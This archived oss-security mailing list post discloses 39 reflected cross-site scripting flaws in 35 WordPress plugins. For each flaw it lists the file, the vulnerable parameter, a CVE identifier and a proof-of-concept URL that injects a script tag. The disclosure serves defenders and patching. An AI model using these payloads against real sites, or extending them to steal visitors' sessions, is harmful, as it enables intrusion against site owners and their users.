Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 12 Apr 2016 08:48:01 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: 39 XSS vulnerabilities in 35 wordpress plugins.

Hello List,


This was a project I worked on as part of my research in Akamai's SIRT, I initially found 1352 suspect XSS vulnerabilities but Wordpress escapes super globals GET/POST/REQUEST
https://core.trac.wordpress.org/ticket/18322.  I didn't know this at the time, so now I have a database of vulnerabilities that are context dependent and would need to be examined
individually.  I managed to automate XSS testing against the database and of 1352 39 successfully executed javascript.  These are those 39, I've manually verified they're still vulnerable.

They're available here http://www.vapidlabs.com/wp/wp.php

I notified Wordpress back in February of my research.


Plugin:https://wordpress.org/plugins/mousewheel-smooth-scroll File:./mousewheel-smooth-scroll/js/wpmss.php Parameter:ease  speed step CVE-2016-77447 PoC:hxxp://[target]/wp-content/plugins/mousewheel-smooth-scroll/js/wpmss.php?step="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/indexisto File:./indexisto/assets/js/indexisto-inject.php Parameter:indexisto_index CVE-2016-77360 PoC:hxxp://[target]/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/prettypre File:./prettypre/prettyprecss.php Parameter:ts CVE-2016-77548 PoC:hxxp://[target]/wp-content/plugins/prettypre/prettyprecss.php?ts="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/whizz File:./whizz/plugins/delete-plugin.php Parameter:plugin CVE-2016-77799 PoC:hxxp://[target]/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/mypuzzle-jigsaw File:./mypuzzle-jigsaw/getGallery.php Parameter:callback CVE-2016-77465 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-jigsaw/getGallery.php?callback="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/anti-plagiarism File:./anti-plagiarism/js.php Parameter:m CVE-2016-77035 PoC:hxxp://[target]/wp-content/plugins/anti-plagiarism/js.php?m="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/qoate-scroll-triggered-box File:./qoate-scroll-triggered-box/assets/js/script.php Parameter:anim perc sac vpos CVE-2016-77559 PoC:hxxp://[target]/wp-content/plugins/qoate-scroll-triggered-box/assets/js/script.php?anim="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/s3-video File:./s3-video/views/video-management/preview_video.php Parameter:media CVE-2016-77600 PoC:hxxp://[target]/wp-content/plugins/s3-video/views/video-management/preview_video.php?media="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wpsolr-search-engine File:./wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php Parameter:page  tab CVE-2016-77958 PoC:hxxp://[target]/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/page-layout-builder File:./page-layout-builder/includes/layout-settings.php Parameter:layout_settings_id CVE-2016-77503 PoC:hxxp://[target]/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/mypuzzle-sliding File:./mypuzzle-sliding/getGallery.php Parameter:callback CVE-2016-77466 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-sliding/getGallery.php?callback="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/date_select.php Parameter:date-from date-to CVE-2016-77217 PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/date_select.php?date-from="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/title_az.php Parameter:title_az CVE-2016-77217 PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/title_az.php?title_az="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/tidio-gallery File:./tidio-gallery/popup-insert-help.php Parameter:galleryId id  tidio-gallery CVE-2016-77727 PoC:hxxp://[target]/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/parsi-font File:./parsi-font/css.php Parameter:font size CVE-2016-77506 PoC:hxxp://[target]/wp-content/plugins/parsi-font/css.php?size="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/defa-online-image-protector File:./defa-online-image-protector/redirect.php Parameter:r CVE-2016-77193 PoC:hxxp://[target]/wp-content/plugins/defa-online-image-protector/redirect.php?r="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/new-year-firework File:./new-year-firework/firework/index.php Parameter:music text url CVE-2016-77475 PoC:hxxp://[target]/wp-content/plugins/new-year-firework/firework/index.php?text="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/simpel-reserveren File:./simpel-reserveren/edit.php Parameter:page CVE-2016-77628 PoC:hxxp://[target]/wp-content/plugins/simpel-reserveren/edit.php?page="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/groupon-widget File:./groupon-widget/widget.css.php Parameter:grpn_wdgt_get_it_btn_background grpn_wdgt_link_color grpn_wdgt_price_tag_background grpn_wdgt_shell_background grpn_wdgt_text_color grpn_wdgt_title_color CVE-2016-77332 PoC:hxxp://[target]/wp-content/plugins/groupon-widget/widget.css.php?grpn_wdgt_shell_background="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wp-notifications File:./wp-notifications/css/ln_livenotifications_css.php Parameter:banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77885 PoC:hxxp://[target]/wp-content/plugins/wp-notifications/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wp-latest-posts File:./wp-latest-posts/js/wpcufpn_front.js.php Parameter:id CVE-2016-77873 PoC:hxxp://[target]/wp-content/plugins/wp-latest-posts/js/wpcufpn_front.js.php?id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/ajax-random-post File:./ajax-random-post/js.php Parameter:count interval CVE-2016-77022 PoC:hxxp://[target]/wp-content/plugins/ajax-random-post/js.php?interval="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/admin-font-editor File:./admin-font-editor/css.php Parameter:font size CVE-2016-77009 PoC:hxxp://[target]/wp-content/plugins/admin-font-editor/css.php?size="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/playlist.php Parameter:playlist CVE-2016-77337 PoC:hxxp://[target]/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/mychannel.php Parameter:channel CVE-2016-77337 PoC:hxxp://[target]/wp-content/plugins/hdw-tube/mychannel.php?channel="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/lbak-google-checkout File:./lbak-google-checkout/css/googlecheckout.php Parameter:ih iw ph pw tc CVE-2016-77395 PoC:hxxp://[target]/wp-content/plugins/lbak-google-checkout/css/googlecheckout.php?pw="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/razuna-media-manager File:./razuna-media-manager/pages/ajax/razuna-upload-callback.php Parameter:message responsecode CVE-2016-77577 PoC:hxxp://[target]/wp-content/plugins/razuna-media-manager/pages/ajax/razuna-upload-callback.php?responsecode="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/mypuzzle-find-the-pair-a-memory-game File:./mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php Parameter:callback CVE-2016-77464 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php?callback="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/surveymonkey-button File:./surveymonkey-button/start_survey.php Parameter:jqueryPepPath CVE-2016-77702 PoC:hxxp://[target]/wp-content/plugins/surveymonkey-button/start_survey.php?jqueryPepPath="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hero-maps-pro File:./hero-maps-pro/views/dashboard/index.php Parameter:p v CVE-2016-77341 PoC:hxxp://[target]/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/bbpress-social-network File:./bbpress-social-network/css/ln_livenotifications_css.php Parameter:banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77074 PoC:hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/bbpress-social-network File:./bbpress-social-network/css/ln_livenotifications_cssback.php Parameter:banner_bgcolor dropdown_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77074 PoC:hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_cssback.php?dropdown_bgcolor="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/edit_styles.php Parameter:gid CVE-2016-77517 PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/edit_styles.php?gid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/build.php Parameter:gid CVE-2016-77517 PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/pondol-formmail File:./pondol-formmail/pages/admin-mail-info.php Parameter:itemid CVE-2016-77532 PoC:hxxp://[target]/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/heat-trackr File:./heat-trackr/heat-trackr_abtest_add.php Parameter:id N  WPSLT CVE-2016-77339 PoC:hxxp://[target]/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/tidio-form File:./tidio-form/popup-insert-help.php Parameter:formId id  tidio-form CVE-2016-77726 PoC:hxxp://[target]/wp-content/plugins/tidio-form/popup-insert-help.php?formId="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/simplified-content File:./simplified-content/ooawpframework/js/ajax/OOAAjax.js.php Parameter:ajaxURL CVE-2016-77642 PoC:hxxp://[target]/wp-content/plugins/simplified-content/ooawpframework/js/ajax/OOAAjax.js.php?ajaxURL="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/infusionsoft File:./infusionsoft/Infusionsoft/examples/leadscoring.php Parameter:ContactId CVE-2016-77364 PoC:hxxp://[target]/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><"

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.